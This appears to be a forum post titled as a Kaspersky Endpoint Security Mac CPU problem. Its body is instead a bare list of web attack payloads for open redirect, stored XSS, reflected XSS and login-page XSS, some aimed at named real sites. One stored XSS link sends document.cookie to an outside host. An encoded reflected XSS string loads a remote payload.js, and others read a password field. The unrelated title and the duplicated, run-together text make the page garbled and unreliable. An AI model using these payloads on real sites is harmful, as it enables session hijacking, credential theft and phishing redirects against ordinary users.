KES Mac: High CPU from "kavd" in Kaspersky Endpoint Security for Business Posted September 3, 2021 ##Open Redirecthttp://hackerdomain.com%00@isc2chapter.krhttps://isc2chapter.kr/bbs/login.php?url=http://evil.com\@isc2chapter.kr##Stored XSS{{constructor.constructor('alert(1)')()}}<noscript><p title= "</noscript><img src=x onerror=alert(document.cookie)>">,javascript://x.com%0aalert(1);//<iframe <><a href=javascript:alert(document.cookie)>Click Here</a>=></”/>&_lt;_script>alert(1)&_lt;/scr_ipt>”/><h1>holaaaaaaa||<a href="http://<a href="http://<a href="http://<a href="javascript:alert(document.cookie)" onmouseover="javascript:alert(document.cookie)">aaaaaaaaaaaaaaaaaaaaaaaaaagle.com</a>">aaaaaaaaaaaaaaaaaaaaaaaaaagle.com</a>">aaaaaaaaaaaaaaaaaaaaaaaaaagle.com</a>">gle.com</a> hhh <h1>holaaaaaaa||<a href="http://<a href="http://<a href="http://<a href="javascript:window.location='https://growncheckerworl.com/cookie.php?cookie=document.cookie'" >aaaaaaaaaaaaaaaaaaaaaaaaaagle.com</a>">aaaaaaaaaaaaaaaaaaaaaaaaaagle.com</a>">aaaaaaaaaaaaaaaaaaaaaaaaaagle.com</a>">gle.com</a> hhhk##Reflected XSS%27%20onclick=alert(document.domain)%20accesskey=X%20%3C/script%3E%3Cscript%3Ealert(document.domain)%3C/script%3E%3Cscript%3E%27%20onclick=alert(document.domain)%20accesskey=X%20%3Cnoscript%3E%3C/noscript%3E%3C/script%3E%3Csvg/onload=alert(document.domain)%3E%22%3E%3Cimg%20src=1%20onerror=alert(document.domain)%3E%60%3breturn+false%7d%29%3b%7d%29%3balert%60xss%60;%3c%2f%73%63%72%69%70%74%3eabc`;return+false});});alert`xss`;</script>abc%60%3breturn+false%7d%29%3b%7d%29%3balert%60xss%60;%3c%2f%73%63%72%69%70%74%3e'-alert(document.domain)-'%22%20autofocus%20onfocus=%22alert(document.domain)%22]")%3balert(document.cookie)%3b//%3Csvg%20onpointerenter=z=alert,z`corraldev`%3E%22%26gt%3B%26lt%3Bmeta+http-equiv%3D%22refresh%22+content+%3D%220%3B+url%3D%2F%2Fbit.ly%22%26gt%3B&selectedLocationString=N%2C115%3c%3c%3ca%3ea%3escript%20SrC%3d%22%68%74%74%70s%3a%2f%2f%73%6b%69%6e%6e%79%2d%66%65%61%72%2e%73%75%72%67%65%2e%73%68%2f%70%61%79%6c%6f%61%64%2e%6a%73%22%3e%3c%3c%3ca%3ea%3e%2fscript%3e%22};a=alert,b=document.domain,a(b)//%22%3Cimg/**/src%3D%22x%22/**/onx%3D%22%22/**/onerror%3D%22alert%60l0cpd%60%22%3Ef9y60%22/%3E%22%3Cimg%20src=x%20onerror=alert(1);%3E-20a")});a=alert;a(1);//%22j%0A%0Davascript:confirm(1)%22%20/%3E%3Ch1%3ECLICK%20ME%3C/h1%3E%3C/a%3E%27%3Balert(%27XSS!%27)%2F%2F%27%3Balert%28%27chron0x%27%29%3B%27OnMoUsEoVeR=prompt(/hacked/)//%3C/scr%3Cscript%3Eipt%3E%3Csvg+onload=alert%28document.cookie%29%3Eaa://///%0d%0aa=location.hash.substring%601%60;location=a/*///#javascript:alert%28document.domain%29%3C/noscript%3E%3Csvg+onload=alert%28document.cookie%29%3Ejav%26%23x09;ascript:alert%28confirm_mb_password.value%29;javascript:alert(1)//https://dqdqdqdqdq.myshopify.com##Login Page XSSredirectUrl=javascript://www.aboutyou.de/LOL%250aalert(document.domain)
KES Mac: High CPU from "kavd"
in Kaspersky Endpoint Security for Business
Posted
##Open Redirect
http://hackerdomain.com%00@isc2chapter.kr
https://isc2chapter.kr/bbs/login.php?url=http://evil.com\@isc2chapter.kr
##Stored XSS
{{constructor.constructor('alert(1)')()}}
<noscript><p title= "</noscript><img src=x onerror=alert(document.cookie)>">,
javascript://x.com%0aalert(1);//
<iframe <><a href=javascript:alert(document.cookie)>Click Here</a>=></
”/>&_lt;_script>alert(1)&_lt;/scr_ipt>”/>
<h1>holaaaaaaa||<a href="http://<a href="http://<a href="http://<a href="javascript:alert(document.cookie)" onmouseover="javascript:alert(document.cookie)">aaaaaaaaaaaaaaaaaaaaaaaaaagle.com</a>">aaaaaaaaaaaaaaaaaaaaaaaaaagle.com</a>">aaaaaaaaaaaaaaaaaaaaaaaaaagle.com</a>">gle.com</a> hhh<h1>holaaaaaaa||<a href="http://<a href="http://<a href="http://<a href="javascript:window.location='https://growncheckerworl.com/cookie.php?cookie=document.cookie'" >aaaaaaaaaaaaaaaaaaaaaaaaaagle.com</a>">aaaaaaaaaaaaaaaaaaaaaaaaaagle.com</a>">aaaaaaaaaaaaaaaaaaaaaaaaaagle.com</a>">gle.com</a> hhhk##Reflected XSS
%27%20onclick=alert(document.domain)%20accesskey=X%20
%3C/script%3E%3Cscript%3Ealert(document.domain)%3C/script%3E%3Cscript%3E
%27%20onclick=alert(document.domain)%20accesskey=X%20
%3Cnoscript%3E%3C/noscript%3E%3C/script%3E%3Csvg/onload=alert(document.domain)%3E
%22%3E%3Cimg%20src=1%20onerror=alert(document.domain)%3E
%60%3breturn+false%7d%29%3b%7d%29%3balert%60xss%60;%3c%2f%73%63%72%69%70%74%3e
abc`;return+false});});alert`xss`;</script>
abc%60%3breturn+false%7d%29%3b%7d%29%3balert%60xss%60;%3c%2f%73%63%72%69%70%74%3e
'-alert(document.domain)-'
%22%20autofocus%20onfocus=%22alert(document.domain)%22
]")%3balert(document.cookie)%3b//
%3Csvg%20onpointerenter=z=alert,z`corraldev`%3E
%22%26gt%3B%26lt%3Bmeta+http-equiv%3D%22refresh%22+content+%3D%220%3B+url%3D%2F%2Fbit.ly%22%26gt%3B&selectedLocationString=N%2C115
%3c%3c%3ca%3ea%3escript%20SrC%3d%22%68%74%74%70s%3a%2f%2f%73%6b%69%6e%6e%79%2d%66%65%61%72%2e%73%75%72%67%65%2e%73%68%2f%70%61%79%6c%6f%61%64%2e%6a%73%22%3e%3c%3c%3ca%3ea%3e%2fscript%3e
%22};a=alert,b=document.domain,a(b)//
%22%3Cimg/**/src%3D%22x%22/**/onx%3D%22%22/**/onerror%3D%22alert%60l0cpd%60%22%3Ef9y60
%22/%3E%22%3Cimg%20src=x%20onerror=alert(1);%3E
-20a")});a=alert;a(1);//
%22j%0A%0Davascript:confirm(1)%22%20/%3E%3Ch1%3ECLICK%20ME%3C/h1%3E%3C/a%3E
%27%3Balert(%27XSS!%27)%2F%2F
%27%3Balert%28%27chron0x%27%29%3B%27
OnMoUsEoVeR=prompt(/hacked/)//
%3C/scr%3Cscript%3Eipt%3E%3Csvg+onload=alert%28document.cookie%29%3E
aa://///%0d%0aa=location.hash.substring%601%60;location=a/*///#javascript:alert%28document.domain%29
%3C/noscript%3E%3Csvg+onload=alert%28document.cookie%29%3E
jav%26%23x09;ascript:alert%28confirm_mb_password.value%29;
javascript:alert(1)//https://dqdqdqdqdq.myshopify.com
##Login Page XSS
redirectUrl=javascript://www.aboutyou.de/LOL%250aalert(document.domain)